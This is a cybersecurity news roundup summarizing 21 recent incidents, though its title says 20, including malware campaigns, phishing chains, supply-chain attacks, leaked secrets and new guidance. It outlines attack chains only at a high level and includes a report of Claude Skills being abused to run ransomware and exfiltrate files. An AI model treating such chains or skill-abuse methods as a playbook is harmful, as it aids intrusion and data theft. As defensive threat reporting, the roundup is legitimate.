This Week in Cybersecurity: 20 Threats You Should Know About

The cybersecurity landscape continues to evolve rapidly, with November–December 2025 revealing several high-impact exploits, sophisticated malware strains, global phishing campaigns, and new regulatory guidance. Here’s a comprehensive look at the biggest stories shaking the security world.

1. Critical Yearn Finance yETH Exploit Drains $9M

A severe vulnerability in Yearn Finance’s yETH pool has led to one of DeFi’s most capital-efficient attacks ever recorded.

Researchers say attackers abused a flaw in the protocol’s internal accounting system, exploiting an uncleared gas-saving cache.

🔑 Key Facts

• $9 million stolen
• Attacker deposited only 16 wei ($0.000000000000000045)
• Minted 235 septillion yETH tokens
• Caused by a broken cache reset in the pool
• Called “one of the most capital-efficient DeFi exploits ever” (Check Point)

2. Linux Malware Evolves: New BPFDoor & Symbiote Variants

Fortinet has identified 151 new BPFDoor samples and three Symbiote variants leveraging eBPF for stealth.

⚙️ What's New:

• IPv6 support
• UDP port-hopping for covert C2
• Dynamic protocol handling
• Expanded non-standard ports

Security analysts warn threat actors are using eBPF to evade traditional detection more effectively than ever.

3. Microsoft Blocks Massive Storm-0900 Phishing Campaign

Microsoft intercepted a tens-of-thousands-email phishing blitz using fake:

• Parking tickets
• Medical test results
• Thanksgiving-themed lures

Victims were funneled through:

1. A slider CAPTCHA
2. A ClickFix PowerShell trick
3. Deployment of XWorm malware

Storm-0900 is known for launching phishing waves every week when active.

4. Fake Grant Email Campaign Delivers Stealerium

Trustwave has uncovered a phishing campaign offering victims fake professional achievement grants.

Attack Chain:

• Password-protected ZIP
• HTML page phishing for webmail credentials
• SVG-based ClickFix PowerShell loader
• Installs the Stealerium infostealer

The emails include personalized details, increasing credibility.

5. Russian Threat Group COLDRIVER Targets Reporters Without Borders

French NGO RSF (Reporters Without Borders) was targeted by spear-phishing tied to Russia’s COLDRIVER group.

Attack Details:

• Malicious ProtonMail emails
• Calisto-style decoy PDFs
• Multi-layer redirect via compromised sites
• AiTM (Adversary-in-the-Middle) phishing pages capturing Proton credentials

Proton has since removed the attacker-controlled accounts.

6. Android Expands Scam Protection to Cash App & JPMorgan

Google is rolling out enhanced in-call scam protections in the U.S. for Android users, now supporting:

• Cash App
• JPMorganChase

Key Feature:

If users screen-share or call unknown numbers while using financial apps, Android shows:

• A warning
• A 30-second delay
• An option to stop the call or screen share

This helps break the psychological momentum scammers rely on.

7. TangleCrypt Packer Used in Qilin Ransomware Attack

WithSecure has analyzed TangleCrypt, a new malware packer used to deploy:

• STONESTOP EDR killer
• ABYSSWORKER vulnerable driver (BYOVD)

Although its design is advanced, flaws in the implementation may cause payload crashes, providing defenders with detection opportunities.

8. Let’s Encrypt to Reduce Certificate Validity to 45 Days

Let’s Encrypt is preparing to shorten SSL certificate lifetimes from:

• 90 days → 45 days
• Domain authorization reuse: 30 days → 7 hours

Rollout will complete by 2028, aligning with CA/Browser Forum requirements.

9. Malicious VS Code Extension Drops OctoRAT

A fake VS Code extension, prettier-vscode-plus, mimicked the real Prettier tool to spread malware.

Multi-Stage Chain:

1. VBS dropper
2. PowerShell loader
3. Anivia loader
4. OctoRAT with 70+ remote commands

Attackers used VS Code Marketplace to reach developers directly.

10. 7 Nations Publish OT AI Security Guidance

Cyber agencies from the U.S., U.K., Germany, Canada, Australia, and others released joint guidance for using AI safely in Operational Technology environments.

Key principles include:

• Training staff on AI risks
• Governance and compliance
• Safety-first risk models
• Oversight for industrial & critical infrastructure systems

This marks a rare global alignment on OT security.

11. India Reports GPS Spoofing at Major Airports

Eight major Indian airports, including Delhi, Mumbai, and Bangalore, detected:

• GPS spoofing
• GPS jamming

No accidents occurred, but the government is rolling out advanced cybersecurity measures across the Aviation Authority of India.

12. Shai-Hulud 2.0 Worm Exposes 400,000 Secrets

A massive npm supply-chain attack compromised:

• 800+ packages
• Leaked 400,000 secrets
• Published stolen data in 30,000 GitHub repos

Main infection vectors:

• @postman/tunnel-agent-0.6.7
• @asyncapi/specs-6.8.3

Attackers exploited GitHub CI/CD misconfigurations via pull_request_target.

13. Hacker Jailed for "Evil Twin" Wi-Fi Attacks

An Australian man received 7+ years in prison for:

• Running fake airport Wi-Fi networks
• Phishing personal accounts
• Stealing intimate photos
• Hacking his employer

He used a Wi-Fi Pineapple to create rogue SSIDs mimicking trusted networks.

14. South Korea Busts Massive IP Camera Snooping Operation

Authorities arrested individuals who hacked 120,000 IP cameras, creating and selling:

• Sexual exploitation videos
• Footage from clinics and private homes
• Content fed to a foreign adult site ("Site C")

Three buyers have also been arrested.

15. Public GitLab Repos Leak 17,000 Live Secrets

TruffleHog scanned 5.6 million GitLab repos and found:

• 17,430 verified secrets
• Top leaked credentials:
• GCP
• MongoDB
• Telegram bot tokens
• OpenAI API keys
• AWS keys

One valid secret dated back to 2009.

16. Fake Zendesk Domains Target Help-Desk Teams

The group Scattered LAPSUS$ Hunters is using over 40 phishing domains impersonating Zendesk.

Attacks include:

• Fake SSO login pages
• Fraudulent support tickets
• Delivery of RATs and credential-stealing malware

Analysts warn that copycat groups may also be involved.

17. Claude Skills Abused to Execute Ransomware

Cato Networks showed how an attacker could weaponize Claude Skills to run MedusaLocker ransomware.

Risks:

• Skills gain long-term permissions
• Hidden code can run without re-approval
• Skills can download, execute, and exfiltrate files

Anthropic says this behavior is expected and users receive warnings.

18. Steganographic Loader Drops LokiBot

A .NET loader hides malware inside seemingly legit documents using:

• Steganography
• Memory-only loading

Payloads include:

• Quasar RAT
• LokiBot credential stealer

Targets Windows and Android cryptocurrency wallets and browser credentials.

19. Nimbus Manticore Malware Expands Capabilities

A new Iranian-linked malware strain analyzed by Deep Instinct shows:

• Dynamic module loading
• Anti-analysis features
• Lateral movement
• Privilege escalation

The malware seeks to spread across entire networks, not just single endpoints.

20. Threat Actors Abuse Teams Guest Access

Attackers impersonated IT staff via Microsoft Teams’ Chat with Anyone feature.

Attack chain:

• Fake IT help message
• Phishing link
• Quick Assist installation
• Credential theft & data exfiltration
• A Python-compiled infostealer dropped afterward

Guest access invites were key to initial entry.

21. Matanbuchus 3.0 Adds Protobufs & Obfuscation

The latest version of the Matanbuchus downloader includes:

• Protocol Buffers communication
• Junk code
• Encrypted strings
• API hashing
• Expiration dates
• Scheduled task persistence

It’s being used to drop Rhadamanthys and NetSupport RAT payloads.